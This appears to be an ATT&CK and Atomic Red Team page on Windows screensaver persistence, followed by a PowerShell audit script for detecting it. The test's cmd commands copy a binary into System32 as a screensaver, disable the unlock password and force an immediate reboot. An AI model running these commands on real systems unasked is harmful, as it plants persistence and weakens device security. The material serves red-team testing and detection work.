Adversaries may establish persistence by executing malicious content triggered by user inactivity. Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension.(Citation: Wikipedia Screensaver) The Windows screensaver application scrnsave.scr is located in C:\Windows\System32\, and C:\Windows\sysWOW64\ on 64-bit Windows systems, along with screensavers included with base Windows installations.

The following screensaver settings are stored in the Registry (HKCU\Control Panel\Desktop) and could be manipulated to achieve persistence:
- SCRNSAVE.exe - set to malicious PE path
- ScreenSaveActive - set to '1' to enable the screensaver
- ScreenSaverIsSecure - set to '0' to not require a password to unlock
- ScreenSaveTimeout - sets user inactivity timeout before screensaver is executed

Adversaries can use screensaver settings to maintain persistence by setting the screensaver to run malware after a certain timeframe of user inactivity. (Citation: ESET Gazer Aug 2017)
This test copies a binary into the Windows System32 folder and sets it as the screensaver so it will execute for persistence. Requires a reboot and logon.
Supported Platforms: Windows
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| input_binary | Executable binary to use in place of screensaver for persistence | path | C:\Windows\System32\cmd.exe |
```cmd
copy #{input_binary} "%SystemRoot%\System32\evilscreensaver.scr"
reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaveActive /t REG_SZ /d 1 /f
reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaveTimeout /t REG_SZ /d 60 /f
reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaverIsSecure /t REG_SZ /d 0 /f
reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v SCRNSAVE.EXE /t REG_SZ /d "%SystemRoot%\System32\evilscreensaver.scr" /f
shutdown /r /t 0
```
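The following audit script is an added example, not part of the Atomic Red Team test or of the ATT&CK description. It reads the four values listed above from HKCU\Control Panel\Desktop and reports configurations that match this persistence pattern, including the renamed-binary case the test creates (a copy of cmd.exe saved as evilscreensaver.scr keeps its original version-info file name, which no longer matches the file name on disk). The function name, the trusted-directory list and the 60-second timeout threshold are assumptions made for this example.

```powershell
# Added audit example: inspect per-user screensaver settings and flag values
# consistent with screensaver-based persistence. Function name, trusted
# directories and the timeout threshold are assumptions, not Windows defaults.
function Get-ScreensaverPersistenceFindings {
    [CmdletBinding()]
    param(
        # Registry key holding the per-user screensaver settings
        [string]$KeyPath = 'HKCU:\Control Panel\Desktop',
        # Directories where a legitimate .scr is expected to live (assumed list)
        [string[]]$TrustedDirs = @("$env:SystemRoot\System32", "$env:SystemRoot\SysWOW64"),
        # Inactivity timeout (seconds) at or below which we flag (assumed threshold)
        [int]$ShortTimeoutSeconds = 60
    )

    $findings = @()
    $props = Get-ItemProperty -Path $KeyPath -ErrorAction SilentlyContinue

    # Values are absent when no screensaver has ever been configured
    $scrPath = $props.'SCRNSAVE.EXE'
    $active  = $props.ScreenSaveActive
    $secure  = $props.ScreenSaverIsSecure
    $timeout = $props.ScreenSaveTimeout

    if ([string]::IsNullOrEmpty($scrPath)) {
        return $findings   # nothing configured, nothing to flag
    }

    # Expand %SystemRoot% and similar so the path can be checked on disk;
    # a bare file name is resolved relative to System32
    $expanded = [Environment]::ExpandEnvironmentVariables($scrPath)
    if (-not [System.IO.Path]::IsPathRooted($expanded)) {
        $expanded = Join-Path "$env:SystemRoot\System32" $expanded
    }

    # 1. Screensaver binary outside the expected directories
    $dir = Split-Path -Path $expanded -Parent
    if (-not ($TrustedDirs | Where-Object { $dir -eq $_ })) {
        $findings += "SCRNSAVE.EXE points outside trusted directories: $expanded"
    }

    # 2. Wrong extension or missing file
    if ([System.IO.Path]::GetExtension($expanded) -ne '.scr') {
        $findings += "SCRNSAVE.EXE does not have a .scr extension: $expanded"
    }
    if (-not (Test-Path -LiteralPath $expanded)) {
        $findings += "SCRNSAVE.EXE target does not exist on disk: $expanded"
    } else {
        # 3. Signature not valid (built-in screensavers are Microsoft-signed)
        $sig = Get-AuthenticodeSignature -FilePath $expanded
        if ($sig.Status -ne 'Valid') {
            $findings += "SCRNSAVE.EXE signature status is '$($sig.Status)': $expanded"
        }

        # 4. Renamed binary: version-info OriginalFilename disagrees with the on-disk name.
        #    A copy of cmd.exe saved as evilscreensaver.scr is caught here even though it
        #    sits in System32 and carries a valid Microsoft signature.
        $original = (Get-Item -LiteralPath $expanded).VersionInfo.OriginalFilename
        $leaf = Split-Path -Path $expanded -Leaf
        if ($original -and ($original -ne $leaf)) {
            $findings += "SCRNSAVE.EXE looks like a renamed binary (OriginalFilename '$original'): $expanded"
        }
    }

    # 5. Weak lock and timeout settings of the kind the test above sets explicitly
    if ($active -eq '1' -and $secure -eq '0') {
        $findings += 'Screensaver is active but ScreenSaverIsSecure=0 (no password required on resume)'
    }
    if ($timeout -and [int]$timeout -le $ShortTimeoutSeconds) {
        $findings += "ScreenSaveTimeout is short ($timeout s)"
    }

    return $findings
}

# Usage: run in the context of the user being audited (HKCU is per-user)
$results = Get-ScreensaverPersistenceFindings
if (-not $results) { 'No suspicious screensaver settings found' } else { $results }
```

Because the settings live under HKCU, the script must run as (or with the loaded hive of) each user being audited; for fleet-wide checks, the same five conditions map directly onto Registry value-set telemetry (for example Sysmon Event ID 13 on SCRNSAVE.EXE, ScreenSaverIsSecure and ScreenSaveTimeout) and file-creation events for new .scr files under System32.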